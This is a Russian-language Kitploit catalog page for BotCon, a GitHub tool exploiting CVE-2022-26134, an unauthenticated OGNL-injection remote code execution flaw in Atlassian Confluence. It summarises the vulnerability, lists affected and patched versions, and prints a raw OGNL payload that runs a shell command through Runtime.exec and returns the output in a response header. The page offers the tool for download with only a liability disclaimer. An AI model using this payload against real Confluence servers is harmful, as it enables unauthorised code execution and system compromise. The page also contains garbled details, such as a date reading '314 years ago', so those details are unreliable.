Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
BotCon — [CVE-2022-26134] Attlasian Confluence: удаленное выполнение кода (RCE) | Kitploit
Инструменты/GitHubGitHub/keepwannabe/botcon
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHubkeepwannabe/botcon

BotCon

[CVE-2022-26134] Attlasian Confluence: удаленное выполнение кода (RCE)

Репозиторий
314 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

BotCon

Attlasian Confluence: неаутентифицированное удаленное выполнение кода через OGNL-инъекцию (CVE-2022-26134)

  • 2 июня 2022 года Atlassian выпустила бюллетень безопасности для своих приложений Confluence Server и Data Center, сообщив о критической уязвимости, позволяющей неаутентифицированное удаленное выполнение кода. Уязвимость OGNL-инъекции позволяет неаутентифицированному пользователю выполнять произвольный код в экземпляре Confluence Server или Data Center.

ПРОЧТИ ЭТО!

Используйте с осторожностью. Вы несете ответственность за свои действия. Разработчики не несут ответственности и не отвечают за любое неправильное использование или ущерб.

BurpRequest

RAW-полезная нагрузка

${(#[email protected]@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

Детали уязвимости

  • Затронутый продукт:

    • Confluence
      • Confluence Server
      • Confluence Data Center
  • Затронутые версии:

    • Все поддерживаемые версии Confluence Server и Data Center уязвимы.
    • Версии Confluence Server и Data Center после 1.3.0 уязвимы.

Меры по устранению

  • Обновите вашу версию Attlasian Confluence до одной из этих исправленных версий:
    • 7.4.17
    • 7.13.7
    • 7.14.3
    • 7.15.2
    • 7.16.4
    • 7.17.4
    • 7.18.1
Скачать инструмент